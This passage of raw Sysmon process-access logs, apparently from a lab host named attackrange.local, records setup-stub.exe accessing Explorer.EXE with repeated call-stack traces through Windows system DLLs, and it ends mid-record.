13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.802{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:53.771{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e35